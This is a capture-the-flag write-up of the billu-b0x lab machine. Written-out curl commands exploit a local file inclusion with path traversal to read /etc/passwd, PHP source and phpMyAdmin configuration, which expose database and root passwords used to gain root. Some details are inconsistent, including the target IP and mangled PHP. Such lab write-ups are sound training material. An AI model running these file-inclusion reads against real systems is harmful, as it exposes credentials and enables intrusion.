## Version 1.4.1
## language: en

Feature:
  TOE:
    billu-b0x
  Category:
    SQL Injection and LFI
  Location:
    http://192.168.1.66:80/test
  CWE:
    CWE-98: Improper Control of Filename for Include/Require Statement in PHP
  Rule:
    Rule.173 Discard unsafe inputs
  Goal:
    Get shell and privilege escalation
  Recommendation:
    Avoid dynamically including files based on user input

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Kali Linux        |  2020.3    |
    | Nmap              |  7.80      |
    | SSH               |  7.9       |
    | dirb              |  2.22      |
    | VirtualBox      | 6.1          |
    | Firefox         | 79.0         |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on virtualbox
    And I realize that a user is required to log in [evidences](01.png)
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.0.1/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-22 13:40 EDT
    Nmap scan report for csp1.zte.com.cn (192.168.0.1)
    Host is up (0.0078s latency).
    Nmap scan report for kali (192.168.0.4)
    Host is up (0.0047s latency).
    Nmap scan report for 192.168.0.6 (192.168.0.6)
    Host is up (0.0038s latency).
    Nmap scan report for indishell (192.168.0.11)
    Host is up (0.0034s latency).
    Nmap done: 256 IP addresses (4 hosts up) scanned in 3.29 seconds
    """
    Then I determined that the ip of the machine is 192.168.0.11
    And it has the ports 22 and 80 open
    """
    $ sudo nmap -sV -sS 192.168.0.11
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-22 13:43 EDT
    Nmap scan report for indishell (192.168.0.11)
    Host is up (0.0050s latency).
    Not shown: 998 closed ports
    PORT     STATE SERVICE    VERSION
    22/tcp open ssh OpenSSH5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
    MAC Address: 08:00:27:B8:EC:AE (Oracle VirtualBox virtual NIC)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at
    Nmap done: 1 IP address (1 host up) scanned in 9.47 seconds
    """

  Scenario: Normal use case
    Given I access the site http://192.168.0.11:80/
    And the billu B0x homepage is displayed [evidences](02.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I'm in the website the first thing I did was to check "/robots.txt"
    Then I saw nothing interesting
    """
    User-agent: *
    Disallow: /
    """
    And and then I proceeded to parse with dirb the directories on the server
    """
    $ dirb http://192.168.0.11:80/
    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------

    START_TIME: Tue Sep 22 13:49:49 2020
    URL_BASE: http://192.168.0.11:80/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

    -----------------

    GENERATED WORDS: 4612

    ---- Scanning URL: http://192.168.0.11:80/ ----
    + http://192.168.0.11:80/add (CODE:200|SIZE:307)
    + http://192.168.0.11:80/c (CODE:200|SIZE:1)
    + http://192.168.0.11:80/cgi-bin/ (CODE:403|SIZE:288)
    + http://192.168.0.11:80/head (CODE:200|SIZE:2793)
    ==> DIRECTORY: http://192.168.0.11:80/images/
    + http://192.168.0.11:80/in (CODE:200|SIZE:47543)
    + http://192.168.0.11:80/index (CODE:200|SIZE:3267)
    + http://192.168.0.11:80/index.php (CODE:200|SIZE:3267)
    + http://192.168.0.11:80/panel (CODE:302|SIZE:2469)
    + http://192.168.0.11:80/server-status (CODE:403|SIZE:293)
    + http://192.168.0.11:80/show (CODE:200|SIZE:1)
    + http://192.168.0.11:80/test (CODE:200|SIZE:72)

    ---- Entering directory: http://192.168.0.11:80/images/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

    -----------------
    END_TIME: Tue Sep 22 13:50:12 2020
    DOWNLOADED: 4612 - FOUND: 11
    """
    Then I carefully checked the nmap report
    Given I access the site http://192.168.1.66:80/test
    Then I see a message [evidences](03.png)
    """
    'file' parameter is empty. Please provide file path in 'file' parameter
    """
    Then is then inferred that may be vulnerable by LFI

  Scenario: Exploitation
    Given the site is vulnerable to LFI
    Then the idea is to take advantage of vulnerability as a first validation
    And read the file path /etc/pwssd
    """
    curl -X POST --data "file=../../../../../etc/passwd" 192.168.0.11/test.php

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    syslog:x:101:103::/home/syslog:/bin/false
    mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
    messagebus:x:103:106::/var/run/dbus:/bin/false
    whoopsie:x:104:107::/nonexistent:/bin/false
    landscape:x:105:110::/var/lib/landscape:/bin/false
    sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
    ica:x:1000:1000:ica,,,:/home/ica:/bin/bash
    """
    Given the site then returns the list of system users
    And the root admin user is not found
    Then you proceed to read the code of the index.php as a file parameter
    """
    curl -X POST --data "file=index.php" 192.168.0.11/test.php
    <?php
    session_start();

    include('c.php');
    include('head.php');
    if(@$_SESSION['logged']!=true)
    {
    $_SESSION['logged']='';

    }
    if($_SESSION['logged']==true &&  $_SESSION['admin']!='')
    {

    echo "you are logged in :)";
    header('Location: panel.php', true, 302);
    {
    else
    {
    echo '<div align=center style="margin:30px 0px 0px 0px;">
    <font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font>
    <br><br>
    Show me your SQLI skills <br>
    <form method=post>
    Username :- <Input type=text name=un> &nbsp Password:- <input type=password
    name=ps> <br><br>
    <input type=submit name=login value="let\'s login">';
    }
    if(isset($_POST['login']))
    {
    $uname=str_replace('\'','',urldecode($_POST['un']));
    $pass=str_replace('\'','',urldecode($_POST['ps']));
    $result = mysqli_query($conn, $run);
    if (mysqli_num_rows($result) > 0) {

    $row = mysqli_fetch_assoc($result);
    echo "You are allowed<br>";
    $_SESSION['logged']=true;
    $_SESSION['admin']=$row['username'];

    header('Location: panel.php', true, 302);
    else
    {
    echo "<script>alert('Try again');</script>";
    }
    }
    echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0;
    position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff993
    3>Pirates</font> ";

    ?>
    """
    Given you will find two c.php and head.php files
    Then now we will enumerate these two files
    """
    curl -X POST --data "file=c.php" 192.168.0.11/test.php
    <?php
    #header( 'Z-Powered-By:its chutiyapa xD' );
    header('X-Frame-Options: SAMEORIGIN');
    header( 'Server:testing only' );
    header( 'X-Powered-By:testing only' );

    ini_set( 'session.cookie_httponly', 1 );

    $conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

    // Check connection
    if (mysqli_connect_errno())
    {
    echo "connection failed ->  " . mysqli_connect_error();
    }

    ?>
    """
    Given you will find the chain of connection to the DB
    Then the user is validated "billu" and password "b0x_billu"
    And is not the root user
    When it is validated as a file parameter
    And the path var/www/phpmy/config.inc.php
    """
    curl -X POST --data "file=/var/www/phpmy/config.inc.php"

    <?php

    /* Servers configuration */
    $i = 0;

    /* Server: localhost [1] */
    $i++;
    $cfg['Servers'][$i]['verbose'] = 'localhost';
    $cfg['Servers'][$i]['host'] = 'localhost';
    $cfg['Servers'][$i]['port'] = '';
    $cfg['Servers'][$i]['socket'] = '';
    $cfg['Servers'][$i]['connect_type'] = 'tcp';
    $cfg['Servers'][$i]['extension'] = 'mysqli';
    $cfg['Servers'][$i]['auth_type'] = 'cookie';
    $cfg['Servers'][$i]['user'] = 'root';
    $cfg['Servers'][$i]['password'] = 'roottoor';
    $cfg['Servers'][$i]['AllowNoPassword'] = true;

    /* End of servers configuration */

    $cfg['DefaultLang'] = 'en-utf-8';
    $cfg['ServerDefault'] = 1;
    $cfg['UploadDir'] = '';
    $cfg['SaveDir'] = '';


    /* rajk - for blobstreaming */
    $cfg['Servers'][$i]['bs_garbage_threshold'] = 50;
    $cfg['Servers'][$i]['bs_repository_threshold'] = '32M';
    $cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600;
    $cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M';


    ?>

    <?php
    """
    Given potencial users are listed
    Then I decide to enter that data for login to the virtual machine
    And valid that the user is root [evidences](04.png)

  Scenario: Remediation
    Given The site is susceptible to SQL injection and LFI attacks
    Then there are many ways to defend against these types of attacks
    """
    1. Use of Prepared Statements (with Parameterized Queries)
    2. Use of Stored Procedures
    3. Whitelist Input Validation
    4. Escaping All User Supplied Input
    5. Among other
    """

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      6.2/10 (High) - AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.4/10 (High) - E:H/RL:W/RC:C/
    Environmental: Unique and relevant attributes to a specific user environmen
      7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2020-09-22
